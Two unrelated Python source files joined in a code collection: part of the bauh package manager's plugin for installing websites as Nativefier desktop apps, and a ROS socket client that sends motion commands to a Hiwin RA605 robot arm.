app = WebApplication(url=final_url, name=name, description=desc, icon_url=icon_url)
if self.env_settings.get('electron') and self.env_settings['electron'].get('version'):
app.version = self.env_settings['electron']['version']
app.latest_version = app.version
res.new = [app]
else:
lower_words = words.lower().strip()
installed_matches = [app for app in installed if lower_words in app.name.lower()]
index = self._read_search_index()
if index:
split_words = lower_words.split(' ')
singleword = ''.join(lower_words)
query_list = [*split_words, singleword]
index_match_keys = set()
for key in index:
for query in query_list:
if query in key:
index_match_keys.update(index[key])
if not index_match_keys:
self.logger.info("Query '{}' was not found in the suggestion's index".format(words))
res.installed.extend(installed_matches)
else:
if not os.path.exists(SUGGESTIONS_CACHE_FILE):
# if the suggestions cache was not found, it will not be possible to retrieve the matched apps
# so only the installed matches will be returned
self.logger.warning("Suggestion cached file {} was not found".format(SUGGESTIONS_CACHE_FILE))
res.installed.extend(installed_matches)
else:
with open(SUGGESTIONS_CACHE_FILE) as f:
cached_suggestions = yaml.safe_load(f.read())
if not cached_suggestions:
# if no suggestion is found, it will not be possible to retrieve the matched apps
# so only the installed matches will be returned
self.logger.warning("No suggestion found in {}".format(SUGGESTIONS_CACHE_FILE))
res.installed.extend(installed_matches)
else:
matched_suggestions = [cached_suggestions[key] for key in index_match_keys if cached_suggestions.get(key)]
if not matched_suggestions:
self.logger.warning("No suggestion found for the search index keys: {}".format(index_match_keys))
res.installed.extend(installed_matches)
else:
matched_suggestions.sort(key=lambda s: s.get('priority', 0), reverse=True)
if installed_matches:
# checking if any of the installed matches is one of the matched suggestions
for sug in matched_suggestions:
found = [i for i in installed_matches if i.url == sug.get('url')]
if found:
res.installed.extend(found)
else:
res.new.append(self._map_suggestion(sug).package)
else:
for sug in matched_suggestions:
res.new.append(self._map_suggestion(sug).package)
res.total += len(res.installed)
res.total += len(res.new)
if res.new:
thread_config.join()
if local_config['environment']['electron']['version']:
for app in res.new:
app.version = str(local_config['environment']['electron']['version'])
app.latest_version = app.version
return res
def _read_search_index(self) -> dict:
if os.path.exists(SEARCH_INDEX_FILE):
with open(SEARCH_INDEX_FILE) as f:
return yaml.safe_load(f.read())
else:
self.logger.warning("No search index found at {}".format(SEARCH_INDEX_FILE))
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = True) -> SearchResult:
res = SearchResult([], [], 0)
if os.path.exists(INSTALLED_PATH):
for data_path in glob.glob('{}/*/*data.yml'.format(INSTALLED_PATH)):
with open(data_path, 'r') as f:
res.installed.append(WebApplication(installed=True, **yaml.safe_load(f.read())))
res.total += 1
return res
def downgrade(self, pkg: SoftwarePackage, root_password: str, handler: ProcessWatcher) -> bool:
pass
def update(self, pkg: SoftwarePackage, root_password: str, watcher: ProcessWatcher) -> bool:
pass
def uninstall(self, pkg: WebApplication, root_password: str, watcher: ProcessWatcher) -> bool:
self.logger.info("Checking if {} installation directory {} exists".format(pkg.name, pkg.installation_dir))
if not os.path.exists(pkg.installation_dir):
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.install_dir.not_found'].format(bold(pkg.installation_dir)),
type_=MessageType.ERROR)
return False
self.logger.info("Removing {} installation directory {}".format(pkg.name, pkg.installation_dir))
try:
shutil.rmtree(pkg.installation_dir)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(pkg.installation_dir)),
type_=MessageType.ERROR)
traceback.print_exc()
return False
self.logger.info("Checking if {} desktop entry file {} exists".format(pkg.name, pkg.desktop_entry))
if os.path.exists(pkg.desktop_entry):
try:
os.remove(pkg.desktop_entry)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(pkg.desktop_entry)),
type_=MessageType.ERROR)
traceback.print_exc()
autostart_path = pkg.get_autostart_path()
if os.path.exists(autostart_path):
try:
os.remove(autostart_path)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(autostart_path)),
type_=MessageType.WARNING)
traceback.print_exc()
config_path = pkg.get_config_dir()
if config_path and os.path.exists(config_path):
try:
shutil.rmtree(config_path)
except:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['web.uninstall.error.remove'].format(bold(config_path)),
type_=MessageType.WARNING)
traceback.print_exc()
return True
def get_managed_types(self) -> Set[Type[SoftwarePackage]]:
return {WebApplication}
def get_info(self, pkg: WebApplication) -> dict:
if pkg.installed:
info = {'0{}_{}'.format(idx + 1, att): getattr(pkg, att) for idx, att in enumerate(('url', 'description', 'version', 'categories', 'installation_dir', 'desktop_entry'))}
info['07_exec_file'] = pkg.get_exec_path()
info['08_icon_path'] = pkg.get_disk_icon_path()
if os.path.exists(pkg.installation_dir):
info['09_size'] = get_human_size_str(get_dir_size(pkg.installation_dir))
config_dir = pkg.get_config_dir()
if config_dir:
info['10_config_dir'] = config_dir
if info.get('04_categories'):
info['04_categories'] = [self.i18n[c.lower()].capitalize() for c in info['04_categories']]
return info
else:
return {'0{}_{}'.format(idx + 1, att): getattr(pkg, att) for idx, att in enumerate(('url', 'description', 'version', 'categories'))}
def get_history(self, pkg: SoftwarePackage) -> PackageHistory:
pass
def _ask_install_options(self, app: WebApplication, watcher: ProcessWatcher) -> Tuple[bool, List[str]]:
watcher.change_substatus(self.i18n['web.install.substatus.options'])
inp_url = TextInputComponent(label=self.i18n['address'], value=app.url, read_only=True)
inp_name = TextInputComponent(label=self.i18n['name'], value=app.name)
inp_desc = TextInputComponent(label=self.i18n['description'], value=app.description)
cat_ops = [InputOption(label=self.i18n['web.install.option.category.none'].capitalize(), value=0)]
cat_ops.extend([InputOption(label=self.i18n[c.lower()].capitalize(), value=c) for c in self.context.default_categories])
def_cat = cat_ops[0]
if app.categories:
for opt in cat_ops:
if opt.value == app.categories[0]:
def_cat = opt
break
inp_cat = SingleSelectComponent(label=self.i18n['category'], type_=SelectViewType.COMBO, options=cat_ops, default_option=def_cat)
tray_op_off = InputOption(id_='tray_off', label=self.i18n['web.install.option.tray.off.label'], value=0, tooltip=self.i18n['web.install.option.tray.off.tip'])
tray_op_default = InputOption(id_='tray_def', label=self.i18n['web.install.option.tray.default.label'], value='--tray', tooltip=self.i18n['web.install.option.tray.default.tip'])
tray_op_min = InputOption(id_='tray_min', label=self.i18n['web.install.option.tray.min.label'], value='--tray=start-in-tray', tooltip=self.i18n['web.install.option.tray.min.tip'])
tray_opts = [tray_op_off, tray_op_default, tray_op_min]
def_tray_opt = None
if app.preset_options:
for opt in tray_opts:
if opt.id in app.preset_options:
def_tray_opt = opt
break
inp_tray = SingleSelectComponent(type_=SelectViewType.COMBO,
options=tray_opts,
default_option=def_tray_opt,
label=self.i18n['web.install.option.tray.label'])
icon_op_ded = InputOption(id_='icon_ded', label=self.i18n['web.install.option.wicon.deducted.label'], value=0,
tooltip=self.i18n['web.install.option.wicon.deducted.tip'].format('Nativefier'))
icon_op_disp = InputOption(id_='icon_disp', label=self.i18n['web.install.option.wicon.displayed.label'],
value=1, tooltip=self.i18n['web.install.option.wicon.displayed.tip'])
inp_icon = SingleSelectComponent(type_=SelectViewType.COMBO,
options=[icon_op_disp, icon_op_ded],
default_option=icon_op_disp if app.icon_url and app.save_icon else icon_op_ded,
label=self.i18n['web.install.option.wicon.label'])
icon_chooser = FileChooserComponent(allowed_extensions={'png', 'svg', 'ico', 'jpg', 'jpeg'}, label=self.i18n['web.install.option.icon.label'])
form_1 = FormComponent(components=[inp_url, inp_name, inp_desc, inp_cat, inp_icon, icon_chooser, inp_tray], label=self.i18n['web.install.options.basic'].capitalize())
op_single = InputOption(id_='single', label=self.i18n['web.install.option.single.label'], value="--single-instance", tooltip=self.i18n['web.install.option.single.tip'])
op_max = InputOption(id_='max', label=self.i18n['web.install.option.max.label'], value="--maximize", tooltip=self.i18n['web.install.option.max.tip'])
op_fs = InputOption(id_='fullscreen', label=self.i18n['web.install.option.fullscreen.label'], value="--full-screen", tooltip=self.i18n['web.install.option.fullscreen.tip'])
op_nframe = InputOption(id_='no_frame', label=self.i18n['web.install.option.noframe.label'], value="--hide-window-frame", tooltip=self.i18n['web.install.option.noframe.tip'])
op_allow_urls = InputOption(id_='allow_urls', label=self.i18n['web.install.option.allow_urls.label'], value='--internal-urls=.*', tooltip=self.i18n['web.install.option.allow_urls.tip'])
op_ncache = InputOption(id_='no_cache', label=self.i18n['web.install.option.nocache.label'], value="--clear-cache", tooltip=self.i18n['web.install.option.nocache.tip'])
op_insecure = InputOption(id_='insecure', label=self.i18n['web.install.option.insecure.label'], value="--insecure", tooltip=self.i18n['web.install.option.insecure.tip'])
op_igcert = InputOption(id_='ignore_certs', label=self.i18n['web.install.option.ignore_certificate.label'], value="--ignore-certificate", tooltip=self.i18n['web.install.option.ignore_certificate.tip'])
adv_opts = [op_single, op_allow_urls, op_max, op_fs, op_nframe, op_ncache, op_insecure, op_igcert]
def_adv_opts = {op_single, op_allow_urls}
if app.preset_options:
for opt in adv_opts:
if opt.id in app.preset_options:
def_adv_opts.add(opt)
check_options = MultipleSelectComponent(options=adv_opts, default_options=def_adv_opts, label=self.i18n['web.install.options.advanced'].capitalize())
res = watcher.request_confirmation(title=self.i18n['web.install.options_dialog.title'],
body=None,
components=[form_1, check_options],
confirmation_label=self.i18n['continue'].capitalize(),
deny_label=self.i18n['cancel'].capitalize())
if res:
selected = []
if check_options.values:
selected.extend(check_options.get_selected_values())
tray_mode = inp_tray.get_selected()
if tray_mode is not None and tray_mode != 0:
selected.append(tray_mode)
custom_name = inp_name.get_value()
if custom_name:
app.name = custom_name
custom_desc = inp_desc.get_value()
if custom_desc:
app.description = inp_desc.get_value()
cat = inp_cat.get_selected()
if cat != 0:
app.categories = [cat]
if icon_chooser.file_path:
app.set_custom_icon(icon_chooser.file_path)
selected.append('--icon={}'.format(icon_chooser.file_path))
app.save_icon = inp_icon.value == icon_op_disp
return res, selected
return False, []
def _gen_app_id(self, name: str) -> Tuple[str, str]:
treated_name = RE_SYMBOLS_SPLIT.sub('-', name.lower().strip())
config_path = '{}/.config'.format(Path.home())
counter = 0
while True:
app_id = '{}{}'.format(treated_name, '-{}'.format(counter) if counter else '')
if not os.path.exists('{}/{}'.format(INSTALLED_PATH, app_id)):
# checking if there is no config folder associated with the id
if os.path.exists(config_path):
if not glob.glob('{}/{}-nativefier-*'.format(config_path, app_id)):
return app_id, treated_name
counter += 1
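    # Hypothetical walk-through of the loop above (the name and paths are
    # illustrative only, assuming RE_SYMBOLS_SPLIT collapses spaces/punctuation to '-'):
    #
    #   self._gen_app_id('Web App')  ->  ('web-app', 'web-app')
    #   # if '<INSTALLED_PATH>/web-app' already exists, or a matching
    #   # '~/.config/web-app-nativefier-*' folder is found, the counter kicks in:
    #   self._gen_app_id('Web App')  ->  ('web-app-1', 'web-app')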
def _gen_desktop_entry_path(self, app_id: str) -> str:
base_id = app_id
counter = 1
while True:
desk_path = DESKTOP_ENTRY_PATH_PATTERN.format(name=base_id)
if not os.path.exists(desk_path):
return desk_path
else:
base_id = '{}_{}'.format(app_id, counter)
counter += 1
def _ask_update_permission(self, to_update: List[EnvironmentComponent], watcher: ProcessWatcher) -> bool:
icon = resource.get_path('img/web.png', ROOT_DIR)
opts = [InputOption(label='{} ( {} )'.format(f.name, f.size or '?'),
tooltip=f.url, icon_path=icon, read_only=True, value=f.name) for f in to_update]
comps = MultipleSelectComponent(label=None, options=opts, default_options=set(opts))
return watcher.request_confirmation(title=self.i18n['web.install.env_update.title'],
body=self.i18n['web.install.env_update.body'],
components=[comps],
confirmation_label=self.i18n['continue'].capitalize(),
deny_label=self.i18n['cancel'].capitalize())
def _download_suggestion_icon(self, pkg: WebApplication, app_dir: str) -> Tuple[str, bytes]:
try:
if self.http_client.exists(pkg.icon_url, session=False):
icon_path = '{}/{}'.format(app_dir, pkg.icon_url.split('/')[-1])
try:
res = self.http_client.get(pkg.icon_url, session=False)
if not res:
self.logger.info('Could not download the icon {}'.format(pkg.icon_url))
else:
return icon_path, res.content
except:
self.logger.error("An exception has happened when downloading {}".format(pkg.icon_url))
traceback.print_exc()
else:
                self.logger.warning('Could not retrieve the icon {} defined for the suggestion {}'.format(pkg.icon_url, pkg.name))
except:
self.logger.warning('An exception happened when trying to retrieve the icon {} for the suggestion {}'.format(pkg.icon_url,
pkg.name))
traceback.print_exc()
def install(self, pkg: WebApplication, root_password: str, watcher: ProcessWatcher) -> bool:
continue_install, install_options = self._ask_install_options(pkg, watcher)
if not continue_install:
watcher.print("Installation aborted by the user")
return False
watcher.change_substatus(self.i18n['web.env.checking'])
handler = ProcessHandler(watcher)
env_settings = self.env_updater.read_settings()
local_config = read_config()
if local_config['environment']['system'] and not nativefier.is_available():
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['web.install.global_nativefier.unavailable'].format(n=bold('Nativefier'), app=bold(pkg.name)) + '.',
type_=MessageType.ERROR)
return False
env_components = self.env_updater.check_environment(app=pkg, local_config=local_config, env=env_settings, is_x86_x64_arch=self.context.is_system_x86_64())
comps_to_update = [c for c in env_components if c.update]
if comps_to_update and not self._ask_update_permission(comps_to_update, watcher):
return False
if not self.env_updater.update(components=comps_to_update, handler=handler):
watcher.show_message(title=self.i18n['error'], body=self.i18n['web.env.error'].format(bold(pkg.name)), type_=MessageType.ERROR)
return False
Path(INSTALLED_PATH).mkdir(parents=True, exist_ok=True)
app_id, treated_name = self._gen_app_id(pkg.name)
pkg.id = app_id
app_dir = '{}/{}'.format(INSTALLED_PATH, app_id)
watcher.change_substatus(self.i18n['web.install.substatus.checking_fixes'])
fix = self._get_fix_for(url_no_protocol=self._strip_url_protocol(pkg.url))
fix_path = '{}/fix.js'.format(app_dir)
if fix:
# just adding the fix as an installation option. The file will be written later
self.logger.info('Fix found for {}'.format(pkg.url))
watcher.print('Fix found for {}'.format(pkg.url))
install_options.append('--inject={}'.format(fix_path))
# if a custom icon is defined for an app suggestion:
icon_path, icon_bytes = None, None
if pkg.icon_url and pkg.save_icon and not {o for o in install_options if o.startswith('--icon')}:
download = self._download_suggestion_icon(pkg, app_dir)
if download and download[1]:
icon_path, icon_bytes = download[0], download[1]
pkg.custom_icon = icon_path
                # writing the icon to a temporary folder to be used by the nativefier process
temp_icon_path = '{}/{}'.format(TEMP_PATH, pkg.icon_url.split('/')[-1])
install_options.append('--icon={}'.format(temp_icon_path))
self.logger.info("Writing a temp suggestion icon at {}".format(temp_icon_path))
with open(temp_icon_path, 'wb+') as f:
f.write(icon_bytes)
watcher.change_substatus(self.i18n['web.install.substatus.call_nativefier'].format(bold('nativefier')))
electron_version = str(next((c for c in env_components if c.id == 'electron')).version)
installed = handler.handle_simple(nativefier.install(url=pkg.url, name=app_id, output_dir=app_dir,
electron_version=electron_version,
system=bool(local_config['environment']['system']),
cwd=INSTALLED_PATH,
extra_options=install_options))
if not installed:
msg = '{}.{}.'.format(self.i18n['wen.install.error'].format(bold(pkg.name)),
self.i18n['web.install.nativefier.error.unknown'].format(bold(self.i18n['details'].capitalize())))
watcher.show_message(title=self.i18n['error'], body=msg, type_=MessageType.ERROR)
return False
inner_dir = os.listdir(app_dir)
if not inner_dir:
msg = '{}.{}.'.format(self.i18n['wen.install.error'].format(bold(pkg.name)),
self.i18n['web.install.nativefier.error.inner_dir'].format(bold(app_dir)))
watcher.show_message(title=self.i18n['error'], body=msg, type_=MessageType.ERROR)
return False
# bringing the inner app folder to the 'installed' folder level:
inner_dir = '{}/{}'.format(app_dir, inner_dir[0])
temp_dir = '{}/tmp_{}'.format(INSTALLED_PATH, treated_name)
os.rename(inner_dir, temp_dir)
shutil.rmtree(app_dir)
os.rename(temp_dir, app_dir)
# injecting a fix
if fix:
            self.logger.info('Writing JS fix at {}'.format(fix_path))
with open(fix_path, 'w+') as f:
f.write(fix)
        # persisting the custom suggestion icon in the definitive directory
if icon_bytes:
self.logger.info("Writting the final custom suggestion icon at {}".format(icon_path))
with open(icon_path, 'wb+') as f:
f.write(icon_bytes)
pkg.installation_dir = app_dir
version_path = '{}/version'.format(app_dir)
if os.path.exists(version_path):
with open(version_path, 'r') as f:
pkg.version = f.read().strip()
pkg.latest_version = pkg.version
watcher.change_substatus(self.i18n['web.install.substatus.shortcut'])
desktop_entry_path = self._gen_desktop_entry_path(app_id)
entry_content = self._gen_desktop_entry_content(pkg)
Path(DESKTOP_ENTRIES_DIR).mkdir(parents=True, exist_ok=True)
with open(desktop_entry_path, 'w+') as f:
f.write(entry_content)
pkg.desktop_entry = desktop_entry_path
if '--tray=start-in-tray' in install_options:
autostart_dir = '{}/.config/autostart'.format(Path.home())
Path(autostart_dir).mkdir(parents=True, exist_ok=True)
with open(pkg.get_autostart_path(), 'w+') as f:
f.write(entry_content)
if install_options:
pkg.options_set = install_options
return True
def _gen_desktop_entry_content(self, pkg: WebApplication) -> str:
return """
[Desktop Entry]
Type=Application
Name={name} ( web )
Comment={desc}
Icon={icon}
Exec={exec_path}
{categories}
""".format(name=pkg.name, exec_path=pkg.get_command(),
desc=pkg.description or pkg.url, icon=pkg.get_disk_icon_path(),
categories='Categories={}'.format(';'.join(pkg.categories)) if pkg.categories else '')
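    # Example of a rendered entry for a hypothetical installation (every name and
    # path below is illustrative, not taken from a real install):
    #
    #   [Desktop Entry]
    #   Type=Application
    #   Name=MusicSite ( web )
    #   Comment=https://music.example.com
    #   Icon=/home/user/.local/share/bauh/web/installed/musicsite/icon.png
    #   Exec=/home/user/.local/share/bauh/web/installed/musicsite/musicsite
    #   Categories=AudioVideo;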
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
if BS4_AVAILABLE and LXML_AVAILABLE:
config = read_config(update_file=True)
use_system_env = config['environment']['system']
if not use_system_env:
return True
return nativefier.is_available()
return False
def requires_root(self, action: str, pkg: SoftwarePackage):
return False
def _update_env_settings(self):
self.env_settings = self.env_updater.read_settings()
def _download_suggestions(self):
downloader = SuggestionsDownloader(logger=self.logger, http_client=self.http_client)
self.suggestions = downloader.download()
if self.suggestions:
index_gen = SearchIndexGenerator(logger=self.logger)
Thread(target=index_gen.generate_index, args=(self.suggestions,), daemon=True).start()
def prepare(self):
self.env_thread = Thread(target=self._update_env_settings, daemon=True)
self.env_thread.start()
self.suggestions_downloader = Thread(target=self._download_suggestions, daemon=True)
self.suggestions_downloader.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
pass
def list_warnings(self, internet_available: bool) -> List[str]:
pass
def _fill_suggestion(self, app: WebApplication):
soup_map = self._map_url(app.url)
if soup_map:
soup, res = soup_map[0], soup_map[1]
app.url = res.url
if app.url.endswith('/'):
app.url = app.url[0:-1]
if not app.name:
app.name = self._get_app_name(app.url, soup)
if not app.description:
app.description = self._get_app_description(app.url, soup)
find_url = not app.icon_url or (app.icon_url and not self.http_client.exists(app.icon_url, session=False))
if find_url:
app.icon_url = self._get_app_icon_url(app.url, soup)
app.status = PackageStatus.READY
def _map_suggestion(self, suggestion: dict) -> PackageSuggestion:
app = WebApplication(name=suggestion.get('name'),
url=suggestion.get('url'),
icon_url=suggestion.get('icon_url'),
categories=[suggestion['category']] if suggestion.get('category') else None,
preset_options=suggestion.get('options'),
save_icon=suggestion.get('save_icon', False))
app.set_version(suggestion.get('version'))
description = suggestion.get('description')
if isinstance(description, dict):
app.description = description.get(self.i18n.current_key, description.get(self.i18n.default_key))
elif isinstance(description, str):
app.description = description
if not app.version and self.env_settings and self.env_settings.get('electron'):
app.version = self.env_settings['electron']['version']
app.latest_version = app.version
app.status = PackageStatus.LOADING_DATA
Thread(target=self._fill_suggestion, args=(app,), daemon=True).start()
return PackageSuggestion(priority=SuggestionPriority(suggestion['priority']), package=app)
def _fill_config_async(self, output: dict):
output.update(read_config())
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
local_config = {}
thread_config = Thread(target=self._fill_config_async, args=(local_config,))
thread_config.start()
if self.suggestions:
suggestions = self.suggestions
elif self.suggestions_downloader:
self.suggestions_downloader.join(5)
suggestions = self.suggestions
else:
suggestions = SuggestionsDownloader(logger=self.logger, http_client=self.http_client).download()
# cleaning memory
self.suggestions_downloader = None
self.suggestions = None
if suggestions:
suggestion_list = list(suggestions.values())
suggestion_list.sort(key=lambda s: s.get('priority', 0), reverse=True)
if filter_installed:
installed = {self._strip_url_protocol(i.url) for i in self.read_installed(disk_loader=None).installed}
else:
installed = None
res = []
for s in suggestion_list:
if limit <= 0 or len(res) < limit:
if installed:
surl = self._strip_url_protocol(s['url'])
if surl in installed:
continue
res.append(self._map_suggestion(s))
else:
break
if res:
if not self.env_settings and self.env_thread:
self.env_thread.join()
self.env_thread = None # cleaning memory
if self.env_settings:
for s in res:
s.package.version = self.env_settings['electron']['version']
s.package.latest_version = s.package.version
thread_config.join()
if local_config and local_config['environment']['electron']['version']:
for s in res:
s.package.version = str(local_config['environment']['electron']['version'])
s.package.latest_version = s.package.version
return res
def execute_custom_action(self, action: PackageAction, pkg: SoftwarePackage, root_password: str, watcher: ProcessWatcher) -> bool:
pass
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: WebApplication):
subprocess.Popen(pkg.get_command(), shell=user.is_root())
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
pass
def clear_data(self):
if os.path.exists(ENV_PATH):
print('[bauh][web] Deleting directory {}'.format(ENV_PATH))
try:
shutil.rmtree(ENV_PATH)
print('{}[bauh][web] Directory {} deleted{}'.format(Fore.YELLOW, ENV_PATH, Fore.RESET))
except:
print('{}[bauh][web] An exception has happened when deleting {}{}'.format(Fore.RED, ENV_PATH, Fore.RESET))
traceback.print_exc()
def get_settings(self, screen_width: int, screen_height: int) -> ViewComponent:
config = read_config()
max_width = floor(screen_width * 0.15)
input_electron = TextInputComponent(label=self.i18n['web.settings.electron.version.label'],
value=config['environment']['electron']['version'],
tooltip=self.i18n['web.settings.electron.version.tooltip'],
placeholder='{}: 7.1.0'.format(self.i18n['example.short']),
max_width=max_width,
id_='electron_version')
native_opts = [
InputOption(label=self.i18n['web.settings.nativefier.env'].capitalize(), value=False, tooltip=self.i18n['web.settings.nativefier.env.tooltip'].format(app=self.context.app_name)),
InputOption(label=self.i18n['web.settings.nativefier.system'].capitalize(), value=True, tooltip=self.i18n['web.settings.nativefier.system.tooltip'])
]
select_nativefier = SingleSelectComponent(label="Nativefier",
options=native_opts,
default_option=[o for o in native_opts if o.value == config['environment']['system']][0],
type_=SelectViewType.COMBO,
tooltip=self.i18n['web.settings.nativefier.tip'],
max_width=max_width,
id_='nativefier')
form_env = FormComponent(label=self.i18n['web.settings.nativefier.env'].capitalize(), components=[input_electron, select_nativefier])
return PanelComponent([form_env])
def save_settings(self, component: PanelComponent) -> Tuple[bool, List[str]]:
config = read_config()
form_env = component.components[0]
config['environment']['electron']['version'] = str(form_env.get_component('electron_version').get_value()).strip()
if len(config['environment']['electron']['version']) == 0:
config['environment']['electron']['version'] = None
system_nativefier = form_env.get_component('nativefier').get_selected()
if system_nativefier and not nativefier.is_available():
return False, [self.i18n['web.settings.env.nativefier.system.not_installed'].format('Nativefier')]
config['environment']['system'] = system_nativefier
try:
save_config(config, CONFIG_FILE)
return True, None
except:
return False, [traceback.format_exc()]
|
HiwinRA605_socket_ros_20190614133908.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receives commands from the strategy side and forwards them over a socket to the control-side computer
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speed_Mode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speed_Mode = Speed_Mode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration inside a generator is an error on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
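# Usage sketch for the switch/case recipe above (illustrative only; it mirrors
# how this script calls it further down):
#
#   for case in switch(command):
#       if case(Taskcmd.Action_Type.PtoP):
#           ...  # runs when command matches, then `break` leaves the loop
#           break
#       if case():  # no argument: default branch
#           ...
#           break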
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------ server side -------
def point_data(req): ## receive pose data sent from the strategy side
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm mode data sent from the strategy side
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Arm_SpeedMode(req): ## receive arm speed mode data sent from the strategy side
socket_cmd.Speed_Mode = int('%s'%req.Speed_Mode)
return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('arm_speed_mode',speed_mode, Arm_SpeedMode) ##server speed mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------ server side end -------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
    start_input = int(input('Press 1 to start transmission, 3 to exit: ')) # enter the start command
#start_input = 1
if start_input==1:
while 1:
            ##--------------- socket transmission of arm commands -----------------
            #------- select mode --------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
                #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
                #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
                #------- set arm fast & safe mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.SetMode(socket_cmd.grip,socket_cmd.Speed_Mode)
break
            socket_cmd.action = 5 ## switch back to the initial mode state
            s.send(data.encode('utf-8')) # socket send: encode the command string before transmission
feedback_str = s.recv(1024)
            # the arm side reports the arm state
            if str(feedback_str[2]) == '70': # 'F': the arm is ready to receive the next motion command
feedback = 0
socket_client_arm_state(feedback)
print("isbusy false")
            if str(feedback_str[2]) == '84': # 'T': the arm is busy and cannot execute the next motion command
feedback = 1
socket_client_arm_state(feedback)
print("isbusy true")
            if str(feedback_str[2]) == '54': # '6': the strategy is finished
feedback = 6
